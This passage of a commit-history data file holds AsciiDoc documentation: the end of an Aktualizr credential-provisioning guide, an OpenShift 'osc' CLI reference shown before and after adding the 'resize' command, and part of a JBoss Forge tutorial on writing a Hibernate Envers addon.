has not provisioned and that the device is not known to the server.\n1. Load credentials onto the device, for example with `aktualizr-cert-provider` from the Aktualizr repo: `aktualizr-cert-provider -c credentials.zip -t <device> -d \/var\/sota\/import -r -u`\n1. Verify that Aktualizr provisions correctly with the server using the expected Device ID.\n\n\/\/ end::quick-instructions[]\n\n== Credentials format\n\nThe provisioning credentials zip file format is specified in link:credentials.adoc[]. However, the only files in the archive used by `aktualizr-cert-provider` are `autoprov.url` and `autoprov_credentials.p12`. Note that `treehub.json` is required by `garage-sign`, and offline signing may require additional files.\n","returncode":0,"stderr":"","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"5b8099abc3b64f8f75732f12a8e5b16338c854df","subject":"Doc for osc resize","message":"Doc for osc resize\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"cli_reference\/basic_cli_operations.adoc","new_file":"cli_reference\/basic_cli_operations.adoc","new_contents":"= CLI Operations\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nThis topic provides information on some general CLI operations and their syntax.\nYou must link:get_started_cli.html[setup and login] with the CLI before you can\nperform these operations.\n\n== Common Operations\nThe CLI allows interaction with the various objects that are managed by\nOpenShift. Many common `osc` operations are invoked using the following syntax:\n\n****\n`$ osc _<action>_ _<object_type>_ _<object_name_or_id>_`\n****\n\nThis specifies:\n\n- An `_<action>_` to perform, such as `get` or `describe`.\n- The `_<object_type>_` to perform the action on, such as `service` or the abbreviated `svc`.\n- The `_<object_name_or_id>_` of the specified `_<object_type>_`.\n\nFor example, the `osc get` operation returns a complete list of services that\nare currently defined:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc get svc\nNAME LABELS SELECTOR IP PORT(S)\ndocker-registry docker-registry=default docker-registry=default 172.30.78.158 5000\/TCP\nkubernetes component=apiserver,provider=kubernetes <none> 172.30.0.2 443\/TCP\nkubernetes-ro component=apiserver,provider=kubernetes <none> 172.30.0.1 80\/TCP\n----\n====\n\nThe `osc describe` operation can then be used to return detailed information\nabout a specific object:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe svc docker-registry\nName:\t\t\tdocker-registry\nLabels:\t\t\tdocker-registry=default\nSelector:\t\tdocker-registry=default\nIP:\t\t\t172.30.78.158\nPort:\t\t\t<unnamed>\t5000\/TCP\nEndpoints:\t\t10.1.0.2:5000\nSession Affinity:\tNone\nNo events.\n----\n====\n\nThe following table describes common `osc` operations and their general syntax:\n\n.Common CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`get`\n|`osc get _<object_type>_ _<object_name_or_id>_`\n|Returns a list of objects for the specified link:#object-types[object type]. If the optional `_<object_name_or_id>_` is included in the request, then the list of results is filtered by that value.\n\n|`describe`\n|`osc describe _<object_type>_ _<object_id>_`\n|Returns information about the specific object returned by the query; a specific `_<object_name_or_id>_` must be provided. The actual information that is available varies as described in link:#object-types[object type].\n\n|`create`\n|`osc create -f _<file_or_directory_path>_`\n|Parses a configuration file and creates one or more OpenShift objects based on the file contents. The `-f` flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc create` iterates through each one, creating the objects described in all of the indicated files. Any existing resources are ignored.\n\n|`resize`\n|`osc resize _<object_type>_ _<object_id>_ _<#_of_replicas>_`\n|Resizes a replication controller either directly or indirectly via a deployment configuration; `_<#_of_replicas>_` must be provided.\n\n|`update`\n|`osc update -f _<file_or_directory_path>_`\n|Attempts to modify an existing object based on the contents of the specified configuration file. The -f flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc update` iterates through each one, updating the objects described in all of the indicated files.\n\n|`delete`\na|`osc delete -f _<file_path>_`\n\n`osc delete _<object_type>_ _<object_name_or_id>_`\n\n`osc delete _<object_type>_ -l _<label>_`\n\n`osc delete all -l _<label>_`\n.^|Deletes the specified OpenShift object. An object configuration can also be passed in through STDIN. The `osc delete all -l _<label>_` operation deletes all objects matching the specified `_<label>_`.\n\n|`log`\n|`osc log -f _<pod_name>_ _<container_name>_`\n|Retrieves the log output for a specific pod or container. This command does not work for other object types.\n|===\n\n== Object Types\nThe CLI supports the following object types, some of which have abbreviated\nsyntax:\n\n.Supported Object Types\n[options=\"header\"]\n|===\n\n|Object Type |Abbreviated Version\n\n|`build` |\n|`buildConfig` | `bc`\n|`deploymentConfig` | `dc`\n|`imageStream` | `is`\n|`imageStreamTag` | `istag`\n|`imageStreamImage` | `isimage`\n|`event` |`ev`\n|`minion` |`mi`\n|`pod` |`po`\n|`replicationController` |`rc`\n|`service` |`svc`\n|===\n\n== Project Operations\nThese advanced operations for administrators are used to define and instantiate\nOpenShift objects at the project level.\n\nThe simplest way to create a new project is:\n\n****\n`$ osadm new-project _<project_name>_ --display-name=_<display_name>_ --description=_<description>_ --admin=_<admin_username>_ --node-selector=_<node_label_selector>_`\n****\n\nThe following example creates a new project called `test` that appears in the\nManagement Console as \"Openshift 3 Sample\", with `test-admin` as the project\nadmin and launches any pods onto nodes matching label `environment : test`.\n\n====\n\n[options=\"nowrap\"]\n----\n$ osadm new-project test --display-name=\"OpenShift 3 Sample\" --description=\"This is an example project to demonstrate OpenShift v3\" --admin=anypassword:test-admin --node-selector=\"environment=test\"`\n----\n====\n\n.Project CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`process`\n|`osc process -f _<template_file_path>_`\n|Transforms a project template into a project configuration file.\n\n|`apply`\n|`osc apply -f _<config_file_path>_`\n|Creates all of the OpenShift objects for a given project based on the specified configuration file.\n|===\n\n== Build Operations\nOne of the fundamental capabilities of OpenShift is the ability to build\napplications into a container from source. The following table describes the CLI\noperations for working with application builds.\n\n.Build CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`start-build`\n|`osc start-build _<buildConfig_name>_`\n|Manually starts the build process with the specified build configuration file.\n\n|`start-build`\n|`osc start-build --from-build=_<build_name>_`\n|Manually starts the build process by specifying the name of a previous build as a starting point.\n\n|`start-build`\na|`osc start-build _<buildConfig_name>_ --follow`\n\n`osc start-build --from-build=_<build_name>_ --follow`\n|Manually starts the build process by specifying either a configuration file pr the name of a previous build _and_ retrieves its build logs.\n\n|`cancel-build`\n|`osc cancel-build _<build_name>_`\n|Stops a build that is in progress.\n\n|`build-logs`\n|`osc build-logs _<build_name>_`\n|Retrieves the build logs for the specified build.\n|===\n\n== Deployment Operations\nOpenShift provides CLI access to inspect and manipulate\nlink:..\/dev_guide\/deployments.html[deployment configurations] using standard\n`osc` resource operations such as `get`, `create`, and `describe`.\n\nUse the `osc describe` command to describe a deployment configuration in\nhuman-readable form:\n\n****\n`$ osc describe dc _<deployment_config>_`\n****\n\nThe following example describes a deployment configuration called\n`docker-registry`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe dc docker-registry\nName:\t\tdocker-registry\nCreated:\t18 hours ago\nLabels:\t\tdocker-registry=default\nLatest Version:\t1\nTriggers:\tConfig\nStrategy:\tRecreate\nTemplate:\n\tSelector:\tdocker-registry=default\n\tReplicas:\t1\n\tContainers:\n\t\tNAME\t\tIMAGE\t\t\t\t\tENV\n\t\tregistry\topenshift\/origin-docker-registry:v0.4.3\tOPENSHIFT_CA_DATA=[omitted for space],OPENSHIFT_MASTER=https:\/\/10.245.2.2:8443\nLatest Deployment:\n\tName:\t\tdocker-registry-1\n\tStatus:\t\tComplete\n\tSelector:\tdeployment=docker-registry-1,deploymentconfig=docker-registry,docker-registry=default\n\tLabels:\t\tdocker-registry=default\n\tReplicas:\t1 current \/ 1 desired\n\tPods Status:\t1 Running \/ 0 Waiting \/ 0 Succeeded \/ 0 Failed\n----\n====\n\n*Deployment Rollbacks*\n\nRollbacks revert an application back to a previous deployment, and they include\nenvironment variable and volumes. Therefore, when deciding whether a rollback is\nviable or not, among other things, consider the following:\n\n- If security credentials have been recently updated, the previous deployment\nmay not have the correct values.\n- If the previous deployment used a custom strategy which is no longer available\nor usable, the deployment may not be deployed correctly.\n\nDuring a rollback, only the configuration of pods and containers is changed by\ndefault, while the scaling or trigger settings remain unchanged.\n\nThe `-d` or `--dry run` option shows the configuration of the updated deployment\nin an easy to read format without actually executing the rollback. This allows\nyou to inspect the output before actually proceeding with the rollback.\n\nUse the `osc rollback` command to revert part of an application back to a\nprevious deployment:\n\n****\n`$ osc rollback _<deployment>_ [_<options>_]`\n****\n\n.Rollback CLI Configuration Options\n[cols=\"4,8\",options=\"header\"]\n|===\n\n|Option |Description\n\n.^|`--change-triggers`\n|Include the previous deployment's triggers in the rollback.\n\n.^|`--change-strategy`\n|Include the previous deployment's strategy in the rollback.\n\n.^|`-d, --dry-run`\n|Instead of performing the rollback, describe what the rollback will look like in human-readable form.\n\n.^|`-o, --output`\n|Instead of performing the rollback, print the updated deployment configuration in the specified format: `json`\\|`yaml`\\|`template`\\|`templatefile`.\n\n.^|`-t, --template`\n|Template string or path to template file to use when `-o=template` or `-o=templatefile`.\n|===\n\nTo perform a rollback:\n\n====\n\n----\n$ osc rollback deployment-1\n----\n====\n\nTo see what the rollback will look like without performing the rollback:\n\n====\n\n----\n$ osc rollback deployment-1 --dry-run\n----\n====\n\nTo perform the rollback manually by piping the *JSON* of the new configuration back to `osc`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc rollback deployment-1 --output=json | osc update deploymentConfigs deployment -f -\n----\n====\n","old_contents":"= CLI Operations\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nThis topic provides information on some general CLI operations and their syntax.\nYou must link:get_started_cli.html[setup and login] with the CLI before you can\nperform these operations.\n\n== Common Operations\nThe CLI allows interaction with the various objects that are managed by\nOpenShift. Many common `osc` operations are invoked using the following syntax:\n\n****\n`$ osc _<action>_ _<object_type>_ _<object_name_or_id>_`\n****\n\nThis specifies:\n\n- An `_<action>_` to perform, such as `get` or `describe`.\n- The `_<object_type>_` to perform the action on, such as `service` or the abbreviated `svc`.\n- The `_<object_name_or_id>_` of the specified `_<object_type>_`.\n\nFor example, the `osc get` operation returns a complete list of services that\nare currently defined:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc get svc\nNAME LABELS SELECTOR IP PORT(S)\ndocker-registry docker-registry=default docker-registry=default 172.30.78.158 5000\/TCP\nkubernetes component=apiserver,provider=kubernetes <none> 172.30.0.2 443\/TCP\nkubernetes-ro component=apiserver,provider=kubernetes <none> 172.30.0.1 80\/TCP\n----\n====\n\nThe `osc describe` operation can then be used to return detailed information\nabout a specific object:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe svc docker-registry\nName:\t\t\tdocker-registry\nLabels:\t\t\tdocker-registry=default\nSelector:\t\tdocker-registry=default\nIP:\t\t\t172.30.78.158\nPort:\t\t\t<unnamed>\t5000\/TCP\nEndpoints:\t\t10.1.0.2:5000\nSession Affinity:\tNone\nNo events.\n----\n====\n\nThe following table describes common `osc` operations and their general syntax:\n\n.Common CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`get`\n|`osc get _<object_type>_ _<object_name_or_id>_`\n|Returns a list of objects for the specified link:#object-types[object type]. If the optional `_<object_name_or_id>_` is included in the request, then the list of results is filtered by that value.\n\n|`describe`\n|`osc describe _<object_type>_ _<object_id>_`\n|Returns information about the specific object returned by the query; a specific `_<object_name_or_id>_` must be provided. The actual information that is available varies as described in link:#object-types[object type].\n\n|`create`\n|`osc create -f _<file_or_directory_path>_`\n|Parses a configuration file and creates one or more OpenShift objects based on the file contents. The `-f` flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc create` iterates through each one, creating the objects described in all of the indicated files. Any existing resources are ignored.\n\n|`update`\n|`osc update -f _<file_or_directory_path>_`\n|Attempts to modify an existing object based on the contents of the specified configuration file. The -f flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc update` iterates through each one, updating the objects described in all of the indicated files.\n\n|`delete`\na|`osc delete -f _<file_path>_`\n\n`osc delete _<object_type>_ _<object_name_or_id>_`\n\n`osc delete _<object_type>_ -l _<label>_`\n\n`osc delete all -l _<label>_`\n.^|Deletes the specified OpenShift object. An object configuration can also be passed in through STDIN. The `osc delete all -l _<label>_` operation deletes all objects matching the specified `_<label>_`.\n\n|`log`\n|`osc log -f _<pod_name>_ _<container_name>_`\n|Retrieves the log output for a specific pod or container. This command does not work for other object types.\n|===\n\n== Object Types\nThe CLI supports the following object types, some of which have abbreviated\nsyntax:\n\n.Supported Object Types\n[options=\"header\"]\n|===\n\n|Object Type |Abbreviated Version\n\n|`build` |\n|`buildConfig` | `bc`\n|`deploymentConfig` | `dc`\n|`imageStream` | `is`\n|`imageStreamTag` | `istag`\n|`imageStreamImage` | `isimage`\n|`event` |`ev`\n|`minion` |`mi`\n|`pod` |`po`\n|`replicationController` |`rc`\n|`service` |`svc`\n|===\n\n== Project Operations\nThese advanced operations for administrators are used to define and instantiate\nOpenShift objects at the project level.\n\nThe simplest way to create a new project is:\n\n****\n`$ osadm new-project _<project_name>_ --display-name=_<display_name>_ --description=_<description>_ --admin=_<admin_username>_ --node-selector=_<node_label_selector>_`\n****\n\nThe following example creates a new project called `test` that appears in the\nManagement Console as \"Openshift 3 Sample\", with `test-admin` as the project\nadmin and launches any pods onto nodes matching label `environment : test`.\n\n====\n\n[options=\"nowrap\"]\n----\n$ osadm new-project test --display-name=\"OpenShift 3 Sample\" --description=\"This is an example project to demonstrate OpenShift v3\" --admin=anypassword:test-admin --node-selector=\"environment=test\"`\n----\n====\n\n.Project CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`process`\n|`osc process -f _<template_file_path>_`\n|Transforms a project template into a project configuration file.\n\n|`apply`\n|`osc apply -f _<config_file_path>_`\n|Creates all of the OpenShift objects for a given project based on the specified configuration file.\n|===\n\n== Build Operations\nOne of the fundamental capabilities of OpenShift is the ability to build\napplications into a container from source. The following table describes the CLI\noperations for working with application builds.\n\n.Build CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`start-build`\n|`osc start-build _<buildConfig_name>_`\n|Manually starts the build process with the specified build configuration file.\n\n|`start-build`\n|`osc start-build --from-build=_<build_name>_`\n|Manually starts the build process by specifying the name of a previous build as a starting point.\n\n|`start-build`\na|`osc start-build _<buildConfig_name>_ --follow`\n\n`osc start-build --from-build=_<build_name>_ --follow`\n|Manually starts the build process by specifying either a configuration file pr the name of a previous build _and_ retrieves its build logs.\n\n|`cancel-build`\n|`osc cancel-build _<build_name>_`\n|Stops a build that is in progress.\n\n|`build-logs`\n|`osc build-logs _<build_name>_`\n|Retrieves the build logs for the specified build.\n|===\n\n== Deployment Operations\nOpenShift provides CLI access to inspect and manipulate\nlink:..\/dev_guide\/deployments.html[deployment configurations] using standard\n`osc` resource operations such as `get`, `create`, and `describe`.\n\nUse the `osc describe` command to describe a deployment configuration in\nhuman-readable form:\n\n****\n`$ osc describe dc _<deployment_config>_`\n****\n\nThe following example describes a deployment configuration called\n`docker-registry`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe dc docker-registry\nName:\t\tdocker-registry\nCreated:\t18 hours ago\nLabels:\t\tdocker-registry=default\nLatest Version:\t1\nTriggers:\tConfig\nStrategy:\tRecreate\nTemplate:\n\tSelector:\tdocker-registry=default\n\tReplicas:\t1\n\tContainers:\n\t\tNAME\t\tIMAGE\t\t\t\t\tENV\n\t\tregistry\topenshift\/origin-docker-registry:v0.4.3\tOPENSHIFT_CA_DATA=[omitted for space],OPENSHIFT_MASTER=https:\/\/10.245.2.2:8443\nLatest Deployment:\n\tName:\t\tdocker-registry-1\n\tStatus:\t\tComplete\n\tSelector:\tdeployment=docker-registry-1,deploymentconfig=docker-registry,docker-registry=default\n\tLabels:\t\tdocker-registry=default\n\tReplicas:\t1 current \/ 1 desired\n\tPods Status:\t1 Running \/ 0 Waiting \/ 0 Succeeded \/ 0 Failed\n----\n====\n\n*Deployment Rollbacks*\n\nRollbacks revert an application back to a previous deployment, and they include\nenvironment variable and volumes. Therefore, when deciding whether a rollback is\nviable or not, among other things, consider the following:\n\n- If security credentials have been recently updated, the previous deployment\nmay not have the correct values.\n- If the previous deployment used a custom strategy which is no longer available\nor usable, the deployment may not be deployed correctly.\n\nDuring a rollback, only the configuration of pods and containers is changed by\ndefault, while the scaling or trigger settings remain unchanged.\n\nThe `-d` or `--dry run` option shows the configuration of the updated deployment\nin an easy to read format without actually executing the rollback. This allows\nyou to inspect the output before actually proceeding with the rollback.\n\nUse the `osc rollback` command to revert part of an application back to a\nprevious deployment:\n\n****\n`$ osc rollback _<deployment>_ [_<options>_]`\n****\n\n.Rollback CLI Configuration Options\n[cols=\"4,8\",options=\"header\"]\n|===\n\n|Option |Description\n\n.^|`--change-triggers`\n|Include the previous deployment's triggers in the rollback.\n\n.^|`--change-strategy`\n|Include the previous deployment's strategy in the rollback.\n\n.^|`-d, --dry-run`\n|Instead of performing the rollback, describe what the rollback will look like in human-readable form.\n\n.^|`-o, --output`\n|Instead of performing the rollback, print the updated deployment configuration in the specified format: `json`\\|`yaml`\\|`template`\\|`templatefile`.\n\n.^|`-t, --template`\n|Template string or path to template file to use when `-o=template` or `-o=templatefile`.\n|===\n\nTo perform a rollback:\n\n====\n\n----\n$ osc rollback deployment-1\n----\n====\n\nTo see what the rollback will look like without performing the rollback:\n\n====\n\n----\n$ osc rollback deployment-1 --dry-run\n----\n====\n\nTo perform the rollback manually by piping the *JSON* of the new configuration back to `osc`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc rollback deployment-1 --output=json | osc update deploymentConfigs deployment -f -\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1770328f8e9e867282c292802b16dc144742eefb","subject":"Update developing.adoc","message":"Update developing.adoc","repos":"agoncal\/docs,forge\/docs,addonis1990\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,luiz158\/docs","old_file":"tutorials\/forge-hol\/docs\/chapters\/developing.adoc","new_file":"tutorials\/forge-hol\/docs\/chapters\/developing.adoc","new_contents":"== Developing Forge\n\n\n=== Developing a web application in few seconds\n\nDownload the script https:\/\/github.com\/forge\/docs\/blob\/master\/tutorials\/forge-hol\/script\/generate.fsh\n\n=== Developing Hibernate Envers addon\n\nhttp:\/\/envers.jboss.org\/[Hibernate Envers] is a Hibernate core module that enables auditing of persistence classes.\nIf you want to audit the history of all the changes made to a certain entity or one of its fields during the web\napplication runtime, you just need to audit that with `@Audited`. Envers will create a separate table for each such\nentity, which will hold the changes made to it. +\n\nIn this lab we will develop a Forge addon with the following features:\n\n* Setup Envers for the following project by adding its dependency to the POM\n* Enable auditing an entity by adding the `@Audited` annotation on class level\n\n==== Creating a new Forge addon\n\nCreating a new Forge addon is similar to any new project that you want to create. You can do it manually, you can copy\nand modify an existing project of the same type or you can use a wizard to do it for you. We would certainly recommend\nusing Forge to help you bootstrap everything for several reasons. It knows what exactly which dependencies and artifacts\nyou need as a start so you will not miss anything. Forge will also not create any garbage in your new project. +\n\nBefore creating the Envers addon, you need to start Forge. Please make sure that you have followed the instructions\nin <<installing-forge>> before that. You can create a new addon if you run the following command in the Forge CLI: +\n\n[source, console]\n----\nproject-new --named envers --type addon --topLevelPackage org.jboss.forge.addon --addons org.jboss.forge.addon:javaee,2.12.0.Final\n----\n\nIf you run Forge from JBDS, open the Forge wizard (Ctrl + 4 or CMD + 4 on Mac) then select _Project: New_ and specify\n_envers_ as project name, _org.jboss.forge.addon_ as top level package, enter project location per your preference and\nas a Project type select _Forge Addon_:\n\nimage::developing\/forge-new-project.png[title=\"Creating new addon project\"]\n\nThis will create an empty Maven project that has the following artifacts:\n\n* *pom.xml* where the top level package is the group ID and the project name is the artifact ID. Besides the minimum\nForge dependencies, the command will add also those that you have specified with the `--addons` option in the format\n<group-id>:<artifact-id>,<version>\n* *Standard maven directory structure* plus the top level package\n* *Empty +beans.xml+* in the +src\/main\/resources\/META-INF+ directory. This is because Forge and its addons strongly\nrely on the CDI development model\n* *README.asciidoc* file with a standard skeleton for documenting Forge addons\n\n==== Developing the \"Envers: Setup\" command\n\nThe first command that we are going to create will set up Envers for a project. This basically means that the command\nwill simply add the Envers library dependency to the current project POM. As with the new Forge addon, we can manually\nwrite the command class, copy and modify an existing command or let Forge itself generated it for us. Here we will go\nfor the third option.\n\nIf you are running from the command line interface, type in: +\n\n[source, console]\n----\naddon-new-ui-command --named EnversSetupCommand --commandName \"Envers: Setup\" --categories \"Auditing\"\n----\n\nWhile from the JBDS, after opening the Forge wizard (Ctrl + 4 or CMD + 4 on Mac), you should choose _Addon: New UI Command_\nand enter _EnversSetupCommand_ in the Type Name field, _Envers: Setup_ in the Command name field and add _Auditing_ to\nthe Categories list box: +\n\nimage::developing\/forge-envers-setup-command.png[title=\"Creating _Envers: Setup_ command\"]\n\nThis will generate `EnversSetupCommand` class in the `org.jboss.forge.addon.commands` package (unless you didn't specify\nexplicitly anything else). Forge makes this class extend `AbstractUICommand`, which provides some basic functionality\nlike configuring the command name, the command dialog and the command execution. We will go through these in this and\nthe next few sections. +\n\nThe `getMetadata()` method should be already implemented by Forge:\n\n[source, java]\n----\n @Override\n public UICommandMetadata getMetadata(UIContext context)\n {\n return Metadata.forCommand(EnversSetupCommand.class).name(\n \"Envers: Setup\").category(Categories.create(\"Auditing\"));\n }\n----\n\nThis will basically create a command that can be called _envers-setup_ from the CLI (note the substitution of colons and\nspaces by hyphens) and as _Envers: Setup_ in the _Auditing_ category in the Forge wizard: +\n\nimage::developing\/forge-envers-setup-command-wizard.png[title=\"_Envers: Setup_ command in the _Auditing_ category\"]\n\nAs the newly created command will not require any input from the user, we will leave the `initializeUI` method empty.\nHowever, in order to implement the command execution, we will need to change a little bit our class. More precisely we\nwill have to extend from another abstract command class. The rationale behind this is that we want to update the\n*current* project POM. Extending `AbstractProjectCommand` instead of `AbstractUICommand` will give us some handy\nmethods to access and manipulate the project configuration:\n\n[source, java]\n----\npublic class EnversSetupCommand extends AbstractProjectCommand\n{\n----\n\nWe will have to implement two more abstract methods coming from this parent class:\n\n[source, java]\n----\n @Override\n protected boolean isProjectRequired() \n {\n return true;\n }\n\n @Inject\n private ProjectFactory projectFactory;\n\n @Override\n protected ProjectFactory getProjectFactory() \n {\n return projectFactory;\n }\n----\n\nAfter having specified _Envers: Setup_ as a project command, we can proceed to implementing the `execute` method.\nUsually this is called when the user clicks Finish on the command dialog or in our case where we don't require input:\nwhen the user selects the command from the Forge wizard. +\n\nAs we mentioned earlier, the command will have to add the Hibernate Envers dependency to the project. We are going to\nbuild the Forge representation of this dependency using the DependencyBuilder's utility methods:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = \n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n }\n\n----\n\nSpeaking in Maven terms, this is a dependency to artifact with ID +hibernate-envers+, coming from the +org.hibernate+\ngroup, having version 4.3.6.Final and going into the project's _provided_ scope. +\n\nAfter we have specified our dependency, we will have to add it to the project model. For that purpose we will use the\n`DependencyInstaller` utility, coming from the projects addon:\n\n[source, java]\n----\n @Inject\n private DependencyInstaller dependencyInstaller;\n----\n\nForge 2.0 is based on modular runtime called _Furnace_. The core of Furnace itself is not bound to any development model,\nso the addons can decide which of the Furnace implementations it wants to use. We created our addon with the default\nconfiguration which enables the CDI development model. That is why we asked in the code snippet above Forge to provide\nus with the dependency installer for the current project build system. +\n\nNow it is time to install our dependency:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n\n }\n----\n\nWe are using here one of the helper methods provided by the `AbstractProjectCommand`: `getSelectedProject()`. +\n\nNow our job is done, so it is time to report what we did. We do it by returning the result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nThis will result in a SUCCESS: message in the command line interface and a green popup in the JDBS after our command is\nexecuted. +\n\nNow that we have a command the enables Hibernate Envers, it is time to add another command that will turn on auditing\nfor a given JPA entity.\n\n==== Adding some UI with the \"Envers: Audit entity\" command\n\nWe will create the class for the new command in the same way that we created the one for \"Envers: Setup\": with the help\nof Forge. If you are running the CLI, then simply type:\n\n[source, console]\n----\naddon-new-ui-command --named EnversAuditEntityCommand --commandName \"Envers: Audit entity\" --categories \"Auditing\"\n----\n\nOr alternatively in the JBDS choose _Addon: New UI Command_, enter _EnversAuditEntityCommand_ in the Type Name field,\n_Envers: Audit entity_ in the Command name field and add _Auditing_ to the Categories list box: +\n\nimage::developing\/forge-envers-audit-entity-command.png[title=\"Creating _Envers: Audit entity_ command\"]\n\nThen open the newly created class and make it extend `AbstractProjectCommand` instead of `AbstractUICommand` and also\nadd the unimplemented methods the way you did it in the setup command. +\n\nThis command will have to receive as input the entity class that has to be audited. To achieve this, we need to do two\nthings:\n\n. Obtain and configure a `UIInput` object from Furnace\n. Add our input to the `UIBuilder` in the `initializeUI` method\n\nStarting from number one, we should add the following member field to our command class:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Entity to audit\", required = true)\n private UIInput<JavaResource> auditEntity;\n----\n\nHere we call our field auditEntity. This automatically will add a `--auditEntity` option to our command in the CLI.\nThe type of the field is `UIInput<JavaResource>`, which means a few things:\n\n* The JBDS integration will create a text box control for the audit entity, while the command line interface will expect\na single unbounded value\n* The type of the value for this option should be a file that represents a Java type (class, interface or enumeration)\n\nWe have also specified some additional attributes with the `@WithAttributes` annotation:\n\n* The `label` attribute tells Forge's JBDS integration to override the field name (`auditEntity` in this case) with\n_Entity to audit_. This will be the actual label of the text box in the IDE. This will not however change the option\nname on the command line\n* The `required` attribute will not let the user complete the dialog without entering a value for the entity. The well\nknown asterisk character will be displayed along the label in JBDS\n\nAfter we defined the input field, it is time to add it to the command dialog. In order to do that, we should edit the\n`initializeUI` method:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(auditEntity);\n }\n----\n\nWe can tell now Forge to show a _Browse_ button to the right of the input field, which will open the well known\ntype picker of Eclipse:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n builder.add(auditEntity);\n }\n----\n\nIn Forge you can also set default values for a certain input. This way you can omit specifying its value on the command\nline and in the IDE it will be pre-filled in the command dialog. You can do that with the `setDefaultValue` method of the\n`UIInput`. In our case the UIInput is generified over the JavaResource class. So we'll have to check whether the current\nselection in the UI (being the CLI or JBDS) is a file that represents a Java type. If yes, we will set it as the default\nvalue of the text field:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n Object selection = builder.getUIContext().getInitialSelection().get();\n if (selection instanceof JavaResource)\n auditEntity.setDefaultValue((JavaResource) selection);\n builder.add(auditEntity);\n }\n----\n\nNow the UI of the command is ready. We can go on and implement the `execute` method. First we should get the value\nentered in the text field and convert it to `JavaResource`. Then we will extract the `JavaClassSource` out of it so\nthat we can manipulate things like annotations:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n\n }\n----\n\nNext we will check whether the chosen class has already the `Audited` annotation and if not, will add it to that. At the\nend we'll save the new content and will return successful result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n if (!javaClass.hasAnnotation(\"org.hibernate.envers.Audited\")) {\n javaClass.addAnnotation(\"org.hibernate.envers.Audited\");\n }\n javaResource.setContents(javaClass);\n return Results.success(\n \"Entity \" + javaClass.getQualifiedName() + \" was successfully audited\");\n }\n----\n\nBut what if the user enters invalid input? This could be a file that does not exist, or is not a class or is not a JPA\nentity. We'll implement the `validate(UIValidationContext validator)` method to handle such situations. Whenever it\nfinds illegal input, it will add a validation error to the `validator` parameter. This will bring an error message if\nthe command executes in the CLI and in JBDS will disable the Finish button of the dialog, showing the error message in\nits well known location. This is how we implement the method:\n\n[source, java]\n----\n @Override\n public void validate(UIValidationContext validator)\n {\n super.validate(validator);\n try\n {\n if (!auditEntity.getValue().reify(JavaResource.class).getJavaType()\n .hasAnnotation(Entity.class))\n {\n validator.addValidationError(auditEntity,\n \"The selected class has to be JPA entity\");\n }\n }\n catch (FileNotFoundException e)\n {\n validator.addValidationError(auditEntity,\n \"You must select existing JPA entity to audit\");\n }\n }\n----\n\nFinally, we want to avoid some compilation errors in the project where we will run this command. So it should be only\navailable for execution if the user has called the setup command first, i.e. if the current project has dependency to\nHibernate Envers. You can implement this 